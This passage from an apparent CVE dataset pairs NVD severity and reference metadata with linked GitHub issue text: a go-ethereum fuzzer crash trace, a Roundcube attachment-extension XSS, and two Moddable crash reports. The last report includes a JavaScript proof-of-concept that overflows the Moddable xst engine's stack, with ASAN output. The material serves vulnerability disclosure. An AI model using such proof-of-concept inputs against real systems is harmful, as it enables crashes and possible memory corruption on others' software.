0xd192415624a039b24ad571f96cb438de9f0556a7 --miner.threads 1 console ```` #### Backtrace ```` panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x43195ff] goroutine 1 [running]: github.com/syndtr/goleveldb/leveldb/table.(*Reader).newBlockIter(0xc00031b520, 0xc00033c440, 0x0, 0x0, 0x0, 0x1, 0x0) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/table/reader.go:734 +0xbf github.com/syndtr/goleveldb/leveldb/table.NewReader(0x67d22e8, 0xc00038c198, 0x23b, 0x4, 0x8, 0xc000322630, 0xc0001cd180, 0xc0001cd040, 0x0, 0x0, ...) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/table/reader.go:1085 +0x648 github.com/syndtr/goleveldb/leveldb.(*tOps).open.func1(0xc000581a70, 0xc0002ee100, 0xc0002ee0c0) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/table.go:428 +0x1cb github.com/syndtr/goleveldb/leveldb/cache.(*Cache).Get(0xc0002ee100, 0x0, 0x8, 0xc000152b90, 0x0) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/cache/cache.go:388 +0x28a github.com/syndtr/goleveldb/leveldb.(*tOps).open(0xc000581b60, 0xc00030c370, 0x437fa69, 0x0, 0x0) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/table.go:415 +0x86 github.com/syndtr/goleveldb/leveldb.(*tOps).find(0xc000581b60, 0xc00030c370, 0xc0001a7c08, 0x12, 0x12, 0x0, 0x0, 0x0, 0x0, 0x0, ...) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/table.go:445 +0x90 github.com/syndtr/goleveldb/leveldb.(*version).get.func1(0x0, 0xc00030c370, 0xc0001a7c08) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/version.go:180 +0x465 github.com/syndtr/goleveldb/leveldb.(*version).walkOverlapping(0xc0001ae5a0, 0x0, 0x0, 0x0, 0xc0001a7c08, 0x12, 0x12, 0xc000152ed8, 0xc000152ea8) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/version.go:119 +0x29d github.com/syndtr/goleveldb/leveldb.(*version).get(0xc0001ae5a0, 0x0, 0x0, 0x0, 0xc0001a7c08, 0x12, 0x12, 0x0, 0x0, 0x0, ...) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/version.go:164 +0x2f1 github.com/syndtr/goleveldb/leveldb.(*DB).get(0xc0001d6000, 0x0, 0x0, 0x0, 0x0, 0xc0002ea6a0, 0xa, 0x10, 0x3e137, 0x0, ...) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/db.go:785 +0x385 github.com/syndtr/goleveldb/leveldb.(*DB).Get(0xc0001d6000, 0xc0002ea6a0, 0xa, 0x10, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/db.go:851 +0x13b github.com/ethereum/go-ethereum/ethdb/leveldb.(*Database).Get(0xc00064a100, 0xc0002ea6a0, 0xa, 0x10, 0x7735940005e39400, 0xc000195020, 0xc0005921c0, 0x0, 0x0) github.com/ethereum/go-ethereum/ethdb/leveldb/leveldb.go:190 +0x5a github.com/ethereum/go-ethereum/core/rawdb.NewDatabaseWithFreezer(0x54c0b58, 0xc00064a100, 0xc0001aa6c0, 0x34, 0x525effa, 0x11, 0x410e500, 0xc00064a100, 0x0, 0x0, ...) github.com/ethereum/go-ethereum/core/rawdb/database.go:159 +0xd5 github.com/ethereum/go-ethereum/core/rawdb.NewLevelDBDatabaseWithFreezer(0xc0000417d0, 0x2c, 0x800, 0x1400, 0xc0001aa6c0, 0x34, 0x525effa, 0x11, 0x0, 0x7b, ...) github.com/ethereum/go-ethereum/core/rawdb/database.go:245 +0xf4 github.com/ethereum/go-ethereum/node.(*Node).OpenDatabaseWithFreezer(0xc00047e1a0, 0x5256ae7, 0x9, 0x800, 0x1400, 0x0, 0x0, 0x525effa, 0x11, 0x0, ...) github.com/ethereum/go-ethereum/node/node.go:602 +0x33c github.com/ethereum/go-ethereum/eth.New(0xc00047e1a0, 0xc000355500, 0xc0002d67b8, 0xc000130af0, 0x47c6dd0) github.com/ethereum/go-ethereum/eth/backend.go:130 +0x311 github.com/ethereum/go-ethereum/cmd/utils.RegisterEthService(0xc00047e1a0, 0xc000355500, 0xf, 0x0, 0x1) github.com/ethereum/go-ethereum/cmd/utils/flags.go:1687 +0x225 main.makeFullNode(0xc0001d22c0, 0x525450d, 0x1, 0xc0001ac010) github.com/ethereum/go-ethereum/cmd/geth/config.go:162 +0x14e main.geth(0xc0001d22c0, 0x0, 0x0) github.com/ethereum/go-ethereum/cmd/geth/main.go:311 +0xf4 gopkg.in/urfave/cli%2ev1.HandleAction(0x500f800, 0x5339c80, 0xc0001d22c0, 0xc0000a76e0, 0x0) gopkg.in/urfave/cli.v1@v1.20.0/app.go:490 +0x82 gopkg.in/urfave/cli%2ev1.(*App).Run(0xc0001981a0, 0xc000194180, 0x3, 0x3, 0x0, 0x0) gopkg.in/urfave/cli.v1@v1.20.0/app.go:264 +0x5f5 main.main() github.com/ethereum/go-ethereum/cmd/geth/main.go:254 +0x55 ```` When submitting logs: please submit them as text and not screenshots.
Nodes crash down after receiving a serial of messages generated by fuzzer, and cannot be recovered
https://api.github.com/repos/ethereum/go-ethereum/issues/23866/comments
3
2021-11-08T06:39:09Z
2021-12-15T12:48:34Z
https://github.com/ethereum/go-ethereum/issues/23866
1,047,073,684
23,866
2,791
CVE-2021-44025
2021-11-19T04:15:06.900
Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to XSS in handling an attachment's filename extension when displaying a MIME type warning message.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://bugs.debian.org/1000156" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/roundcube/roundcubemail/commit/7d7b1dfeff795390b69905ceb63d6391b5b0dfe7" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/roundcube/roundcubemail/commit/faf99bf8a2b7b7562206fa047e8de652861e624a" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/roundcube/roundcubemail/issues/8193" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00004.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NDVGIZMQJ5IOM47Y3SAAJRN5VPANKTKO/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TP3Y5RXTUUOUODNG7HFEKWYNIPIT2NL4/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-5013" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://bugs.debian.org/1000156" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/roundcube/roundcubemail/commit/7d7b1dfeff795390b69905ceb63d6391b5b0dfe7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/roundcube/roundcubemail/commit/faf99bf8a2b7b7562206fa047e8de652861e624a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/roundcube/roundcubemail/issues/8193" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00004.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NDVGIZMQJ5IOM47Y3SAAJRN5VPANKTKO/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TP3Y5RXTUUOUODNG7HFEKWYNIPIT2NL4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-5013" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*", "matchCriteriaId": "DA15B6EF-37D5-4C52-ACE8-BFC70EC57247", "versionEndExcluding": "1.3.17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*", "matchCriteriaId": "E2A9DC05-E22B-4AFF-BA40-7B48BA545461", "versionEndExcluding": "1.4.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/roundcube/roundcubemail/issues/8193
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "roundcube", "roundcubemail" ]
It is possible to inject arbitrary html/js code through attachment's $file_extension variable that will be executed while displaying "attachmentvalidationerror" warning.
Fix XSS in $file_extension
https://api.github.com/repos/roundcube/roundcubemail/issues/8193/comments
1
2021-08-31T14:29:18Z
2021-08-31T17:21:43Z
https://github.com/roundcube/roundcubemail/pull/8193
983,930,203
8,193
2,792
CVE-2021-29323
2021-11-19T17:15:08.027
OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow via the component /modules/network/wifi/esp/modwifi.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/Moddable-OpenSource/moddable/issues/5
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Moddable-OpenSource", "moddable" ]
I have tried a few examples and have noticed that some things occur when trying to run `wifi-config` using `mcconfig -d -m -p esp` from my MacBook Pro 2015. 1. `warning: serialport_set_baudrate: baud rate 921600 may not work` appears consistently 2. `install modules failure` shows up after sync hitting 100% sometimes I am presuming this relates to `serialport_set_baudrate` 3. An exception seems to always occur due to some timer, that shows up even without the module failure. ``` Exception (28): epc1=0x4022dced epc2=0x00000000 epc3=0x00000000 excvaddr=0x01610029 depc=0x00000000 ctx: cont sp: 3ffe97a0 end: 3ffe9a70 offset: 01a0 >>>stack>>> 3ffe9940: 3fff839c 0160ffff fffffffe 4022dce7 3ffe9950: 4022dcb4 3ffe9950 00000000 3ffefe04 3ffe9960: fffffffe 3ffe9a9c 3ffe9984 3fff836c 3ffe9970: 3fff838c 3fff839c 00000000 00000000 3ffe9980: 00000000 4022dc6e 3ffe9950 3ffeffd4 3ffe9990: 3ffefe04 fffffffe 3ffe9a9c 00000000 3ffe99a0: 3fff83fc 00000000 00000000 00000000 3ffe99b0: 00000000 00000000 00000000 00000000 3ffe99c0: 3fff8514 3fff8514 3ffefff4 3ffefcec 3ffe99d0: 3fff8514 3ffeff14 3ffefefc 3ffe9a9c 3ffe99e0: fffffffe 3ffefe04 3ffeffd4 4022b614 3ffe99f0: 3fffdad0 00000000 3ffe9a94 402517a8 3ffe9a00: 00000000 00000020 00000035 00000003 3ffe9a10: 3fff8514 4025d01c 00000021 3fff839c 3ffe9a20: 3fff835c 00000000 00000000 4025cb40 3ffe9a30: feefeffe feefeffe feefeffe 3ffe9a9c 3ffe9a40: 00000000 00000000 00000001 402514a1 3ffe9a50: 3fffdad0 00000000 3ffe9a94 402514cc 3ffe9a60: feefeffe feefeffe 3ffe8a50 4010011c <<<stack<<< # EXCEPTION DESCRIPTION # Exception 28 LoadProhibited: A load referenced a page mapped with an attribute that does not permit loads # EXCEPTION LOCATION # 0x4022dced: reportScan at /Users/bfarias/Documents/moddable/modules/network/wifi/esp/modwifi.c:188 # CALLS # 0x4022dce7: reportScan at /Users/bfarias/Documents/moddable/modules/network/wifi/esp/modwifi.c:188 # 0x4022dcb4: reportScan at /Users/bfarias/Documents/moddable/modules/network/wifi/esp/modwifi.c:184 # 0x4022dc6e: reportScan at /Users/bfarias/Documents/moddable/modules/network/wifi/esp/modwifi.c:178 # 0x4022b614: modTimersExecute at /Users/bfarias/Documents/moddable/modules/base/timer/mc/timer.c:111 # 0x402517a8: loop at /Users/bfarias/Documents/moddable//build/devices/esp/main.cpp:85 # 0x402514a1: esp_schedule at /Users/bfarias/esp/esp8266-2.3.0/cores/esp8266/core_esp8266_main.cpp:110 # 0x402514cc: loop_wrapper() at /Users/bfarias/esp/esp8266-2.3.0/cores/esp8266/core_esp8266_main.cpp:110 # 0x4010011c: cont_norm at /Users/bfarias/esp/esp8266-2.3.0/cores/esp8266/cont.S:109 ^[[A^CCaught signal 2 make: *** [debugmac] Error 1 ``` 4. It fails to load once fully synced and prints `/Users/bfarias/Documents/moddable/modules/piu/MC/piuFont.c (247) # Break: (host): font not found: OpenSans--20!` in xsbug. This one seems a bit odd, since my build directory doesn't have that string/file name anywhere, but it does have some other `OpenSans` strings: <details><summary>grep log</summary> ``` $ grep -r "OpenSans" /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config/ Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//main.elf matches /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Regular-20.fnt\ /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Semibold-18.fnt\ /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Semibold-16.fnt\ /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Regular-20-alpha.bmp\ /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Semibold-18-alpha.bmp\ /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Semibold-16-alpha.bmp\ /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Regular-20.fnt: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Regular-20.fnt /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# copy OpenSans-Regular-20.fnt" /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Semibold-18.fnt: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-18.fnt /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# copy OpenSans-Semibold-18.fnt" /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Semibold-16.fnt: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-16.fnt /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# copy OpenSans-Semibold-16.fnt" /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Regular-20-alpha.bmp: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Regular-20.png $(TMP_DIR)/mc.rotation.h /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# png2bmp OpenSans-Regular-20-alpha.bmp" /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(PNG2BMP) /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Regular-20.png -a -o $(@D) -r 0 /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Semibold-18-alpha.bmp: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-18.png $(TMP_DIR)/mc.rotation.h /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# png2bmp OpenSans-Semibold-18-alpha.bmp" /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(PNG2BMP) /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-18.png -a -o $(@D) -r 0 /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Semibold-16-alpha.bmp: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-16.png $(TMP_DIR)/mc.rotation.h /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# png2bmp OpenSans-Semibold-16-alpha.bmp" /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(PNG2BMP) /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-16.png -a -o $(@D) -r 0 /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Regular-20.fnt", _0, sizeof(_0)}, /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Semibold-18.fnt", _1, sizeof(_1)}, /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Semibold-16.fnt", _2, sizeof(_2)}, /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Regular-20-alpha.bmp", _7, sizeof(_7)}, /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Semibold-18-alpha.bmp", _8, sizeof(_8)}, /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Semibold-16-alpha.bmp", _9, sizeof(_9)}, Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c.o matches Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c.o.unmapped matches /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.c:/* 0706 */ { (txSlot*)&gxHeap[604], -32071, 0x84, XS_KEY_X_KIND, { .key = { "OpenSans20", 0x17240 } }}, /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.c:/* 0707 */ { (txSlot*)&gxHeap[580], -32070, 0x84, XS_KEY_X_KIND, { .key = { "OpenSans18", 0x17246 } }}, /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.c:/* 0736 */ { (txSlot*)&gxHeap[726], -32041, 0x84, XS_KEY_X_KIND, { .key = { "OpenSans16", 0x17244 } }}, Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.c.o matches Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.c.o.unmapped matches /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.h:#define xsID_OpenSans20 -32071 /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.h:#define xsID_OpenSans18 -32070 /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.h:#define xsID_OpenSans16 -32041 Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//modules/assets.xsb matches Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//modules/connection-error.xsb matches Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//modules/login.xsb matches Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//modules/mc.xsi matches Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//modules/network-list.xsb matches Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//resources/OpenSans-Regular-20.fnt matches Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//resources/OpenSans-Semibold-16.fnt matches Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//resources/OpenSans-Semibold-18.fnt matches ``` </details>
Wifi-Config example installation issue
https://api.github.com/repos/Moddable-OpenSource/moddable/issues/5/comments
10
2017-12-02T16:10:07Z
2017-12-06T15:35:11Z
https://github.com/Moddable-OpenSource/moddable/issues/5
278,695,069
5
2,793
CVE-2021-29324
2021-11-19T17:15:08.073
OpenSource Moddable v10.5.0 was discovered to contain a stack overflow via the component /moddable/xs/sources/xsScript.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/586" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Moddable-OpenSource/moddable/issues/586" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/Moddable-OpenSource/moddable/issues/586
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Moddable-OpenSource", "moddable" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: cd /pathto/moddable/xs/makefiles/lin make test command: ./xst poc ``` # poc: ``` function getHiddenValue() { var obj = {}; var oob = '/re/'; oob = oob.replace('', '*'.repeat(1048576)); var str = '[1]' + oob + '}'; var t2 = [ 4, 4, 4 ]; var fun = eval(str); var y = 0; Object.assign(obj, fun); return obj; } function makeOobString() { var hiddenValue = getHiddenValue(); var str = 'class x extends Array{}'; var fun = eval(str); var temp = []; Object.assign(fun, hiddenValue); var oobString = fun.toString(); return oobString; } var oobString = makeOobString(); ``` # description ``` ASAN:SIGSEGV ================================================================= ==5984==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd44d69ff0 (pc 0x7f238c4be26e bp 0x000000000028 sp 0x7ffd44d69fe0 T0) #0 0x7f238c4be26d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xb026d) #1 0x7f238c4bdd67 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xafd67) #2 0x7f238c430f4f (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22f4f) #3 0x7f238c4a65d2 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x985d2) #4 0x61189b in fxNewParserChunk /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScript.c:126 #5 0x611994 in fxNewParserChunkClear /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsScript.c:137 #6 0x62be05 in fxPushNodeStruct /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:595 #7 0x63703c in fxLiteralExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:2256 #8 0x634d11 in fxCallExpression /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsSyntaxical.c:1951 #9 0x634aa1 in 